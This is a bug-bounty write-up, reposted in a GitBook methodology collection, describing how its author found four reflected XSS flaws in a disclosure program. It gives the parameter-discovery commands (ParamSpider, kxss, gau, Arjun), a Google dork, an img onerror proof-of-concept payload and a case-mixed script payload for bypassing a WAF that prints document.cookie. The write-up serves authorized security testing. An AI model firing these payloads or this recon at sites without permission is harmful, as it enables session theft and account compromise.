Methodology
  • 🧑‍🏫My Methodologies
  • 🕶️Google Dorks
  • 🌀Possible "Content-Type" Header values
  • 📜Scripts written by me for XSS
  • 🔼Subdomain Takeover
  • ✍️Tips and Write-ups
  • 🔧Tools and their Uses
  • 🎯XSS nuclei template CVE-2023-24488.yaml
  • 🕵️Recon strategies by other Hackers
    • 🔎Blind SQL Injection Detection and Exploitation (Cheat Sheet)
    • 🔎How i got more than 100 vulnerabilities in just one site? (zseano-challenge)
    • 🔎JS is l0ve ❤️.
    • 🔎My top 5 bookmarks that I consistently use for bug bounty and penetration testing.
    • 🔎Find the treasure hidden inside JavaScript
    • 🔎Deep-Subdomains-Enumeration-Methodology
    • 🔎Extensive Recon Guide For Bug Hunting
    • 🔎Finding Time Based SQLi injections : Edition 2023
    • 🔎From Self XSS to Account Take Over(ATO)
    • 🔎How I hacked NASA and got 8 bugs ?
    • 🔎How I was able to find 4 Cross-site scripting (XSS) on vulnerability disclosure program ?
    • 🔎Leakage of credential data for full control over the target.
    • 🔎Recon Like a Boss
    • 🔎Recon With Me
    • 🔎Simple Recon Methodology
    • 🔎SQL injection through HTTP headers
    • 🔎How to Get Unique Subdomains on Large scope
    • 🔎Static Analysis of Client-Side JavaScript for pen testers and bug bounty hunters
  • 🎯subdomain-enumeration
  • 🛠️CRLF
  • ❌xss
  • ⛴️Ghetto XSS Cheatsheet
  • 🚀Oneliners
Powered by GitBook
On this page
  1. Recon strategies by other Hackers

How I was able to find 4 Cross-site scripting (XSS) on vulnerability disclosure program ?

source: https://medium.com/@DrakenKun/how-i-was-able-to-find-4-cross-site-scripting-xss-on-vulnerability-disclosure-program-e2f39199ae16

PreviousHow I hacked NASA and got 8 bugs ?NextLeakage of credential data for full control over the target.

Last updated 1 year ago

Hello I’m Amr Mustafa AKA DrakenKun

Today I’ll explain how I found these reflected XSS vulnerabilities

First I will list the tools that I used during this process :-

  1. ParamSpider

  2. gau

  3. kxss

  4. Arjun

Let’s say our domain name called example.com

I used ParamSpider for finding some interested parameters

python3 paramaspider -d example.com -o parameters.txt

We got a large number of parameters , now in the final output we can see every reflected parameters and unfiltered values. And here comes the role of kxss tool

I just typed :

cat parameters.txt | kxss
some of interested parameters are found here

The vulnerable parameter for XSS should have Unfiltered : [“ ‘ < > $ | ( ) ` : ; { } ]

I noticed here that I got 2 interested vulnerable parameters named “goto” in different endpoints

let’s say the 2 links are

  1. example.com/login.jsp?goto=

2. cloud.example.com/login.html?goto=

Just visited the url and injected my simple payload in the parameter

"><img%20src=x%20onerror="alert(%27POC%20By%20DrakenKun%27)"

Also typed the same payload in the other url and javascript did his job :)

I reported these two vulnerabilities in Bugcrowd with some kind of satisfaction

After exactly 1 day

I asked myself , ok now if you got 2 vulnerable parameters both of them called “goto“ and possible for XSS

how about try finding more of any parameter has the same name ?!!

I simply used google dorks

typed ..

site:"example.com" inurl:"?goto="

I got some results but unfortunately aren’t vulnerable !

gave another chance ..

I used beautiful tool called gau

get all urls (gau) fetches known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, Common Crawl, and URLScan for any given domain. Inspired by Tomnomnom's waybackurls.

Quite simply, all I want is finding any parameter called “goto” to get any chance for finding new XSS’s

gau example.com | grep "?goto="

I visited every results and start inject javascript payloads

and guess what happened ?

Yeah :)

got the third XSS with some basic payload to Bypass the WAF

<%2FScriPt><sCripT+class%3DDrakenKun>document.write(document.cookie);<%2FsCriPt>

Now we got 3 :D

The 3 XSS’s are in 3 different endpoints

I visited them again and start finding any parameters for testing

Here I used tool called Arjun

arjun -u example.com/login.jsp

I got some parameters here and start inject every one of them

one of these parameters is called “SPID” , I noticed that both characters “< >” are refelcted on the source code !

And I quickly start typing my payload

"><img%20src=x%20onerror="alert(%27POC%20By%20DrakenKun%27)"

And Boom !!

I tried that with the other endpoints but I found nothing

I reported these 4 vulnerabilities and Alhamdulillah all of them accepted as Unresolved

You can follow me in twitter to get some useful informations

Thank U ❤

javascript alert !
new results
the source code
The fourth XSS fires !
🕵️
🔎